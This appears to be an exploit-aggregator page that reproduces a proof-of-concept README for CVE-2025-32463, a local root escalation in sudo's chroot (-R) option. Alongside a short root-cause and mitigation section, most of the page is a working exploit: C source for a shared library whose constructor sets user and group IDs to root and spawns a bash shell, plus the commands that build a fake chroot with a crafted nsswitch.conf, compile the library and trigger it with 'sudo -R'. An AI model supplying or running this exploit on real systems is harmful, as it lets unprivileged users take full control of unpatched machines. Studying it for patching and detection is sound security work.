来源

关联漏洞

描述

A PoC exploit for CVE-2025-32463 - Sudo Privilege Escalation

介绍

# CVE-2025-32463 - Sudo Privilege Escalation

A privilege escalation vulnerability exists in `sudo` affecting Linux/Unix-based systems. The flaw arises due to **improper path validation** when `sudo` is used with the `-R` (`--chroot`) option, allowing attackers to escalate to root via malicious NSS library loading.

## **Root Cause**  
- When `sudo` executes a command inside a **chroot environment** (`-R` option), it mishandles **NSS (Name Service Switch) library loading** during error conditions.  
- Improper path validation (e.g., failing to sanitize `LD_LIBRARY_PATH` or paths in `/etc/nsswitch.conf`) may lead to loading a **malicious library** instead of the legitimate NSS library (e.g., `libnss_files.so`).  
- This results in **arbitrary code execution with root privileges**.

## **Impact**  
- Attackers with **local access** can exploit this to **gain root privileges**.  

## **Mitigation**  
1. **Update `sudo`** to the latest patched version.  
2. **Restrict `sudo` permissions** (limit `chroot` usage where possible).  
3. **Audit environment variables**:  
   - Restrict `LD_LIBRARY_PATH`.  
   - Secure `/etc/nsswitch.conf`.  
4. **Enforce `secure_path`** in `/etc/sudoers` to limit library search paths.  

## **Technical Details**  
| Component       | Vulnerability Trigger                     |  
|-----------------|------------------------------------------|  
| **`sudo -R`**   | Incorrect chroot path validation.        |  
| **NSS**         | Unsafe library loading during errors.    |  
| **Exploit**     | Path hijacking → Malicious library load. |  

## Vulnerability Overview

**CVE ID**: CVE-2025-32463  
**Affected Versions**: Sudo 1.9.14 through 1.9.17  
**CVSS Score**: 9.8 (Critical)  
**Impact**: Local privilege escalation to root  

### Attack Flow
1. Attacker creates malicious NSS library
2. Sets up fake chroot environment
3. Triggers sudo error condition
4. Sudo loads attacker-controlled library
5. Malicious code executes with root privileges

# Exploit Steps

## Step 1: Verify vulnerability
**If it responds with `No such file or directory` then its vulnerable:**
`sudo -R invalid invalid`
`sudo: invalid: No such file or directory`

## Step 2: Create Temporary Workspace

**First, we create a temporary directory to work in:**
`
TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX)
cd $TMP_DIR
`
This creates a uniquely named temporary directory and navigates into it. The mktemp command ensures we don't interfere with existing system files.

## Step 3: Create Malicious Library

**We need to create a C file (bridge90.c) that will be compiled into a malicious library:**
```
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Set real and effective user ID to root
  setregid(0,0);  // Set real and effective group ID to root
  chdir("/");     // Change to root directory
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Execute shell
}
```
**Key components:**

    __attribute__((constructor)) ensures the function runs when the library is loaded

    setreuid and setregid escalate privileges to root

    execl spawns a bash shell

## Step 4: Setup Exploit Environment
`
mkdir -p bridge/etc
echo "passwd: /bridge90" > bridge/etc/nsswitch.conf
cp /etc/group bridge/etc/
mkdir libnss_
gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c
`
**Breakdown:**

    Create a fake chroot environment in bridge/etc

    Modify nsswitch.conf to point to our malicious path

    Copy the real /etc/group file to maintain legitimacy

    Create a directory for our malicious library

    Compile the C code into a shared library named to match NSS (Name Service Switch) conventions

## Step 5: Execute the Exploit

`sudo -R bridge bridge`

This command attempts to use our crafted environment:

    The first bridge is the chroot directory containing our malicious configuration

    The second bridge is the command to run (which will load our library)

## Step 6: Verify Privilege Escalation

**After successful exploitation, verify root access:**

`whoami`    # Should return "root"
`id -u`     # Should return "0" (root's UID)

#

```mermaid
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]
```

# Disclaimer

This PoC exploit is for educational purposes only! I'm not responsible for any misuse you might cause with this exploit!

文件快照

 [4.0K]  /data/pocs/74794a0b6dd79df57705c7cd2d11ac5238e7ab46
├── [4.9K]  CVE-2025-32463.sh
└── [4.3K]  README.md

0 directories, 2 files

备注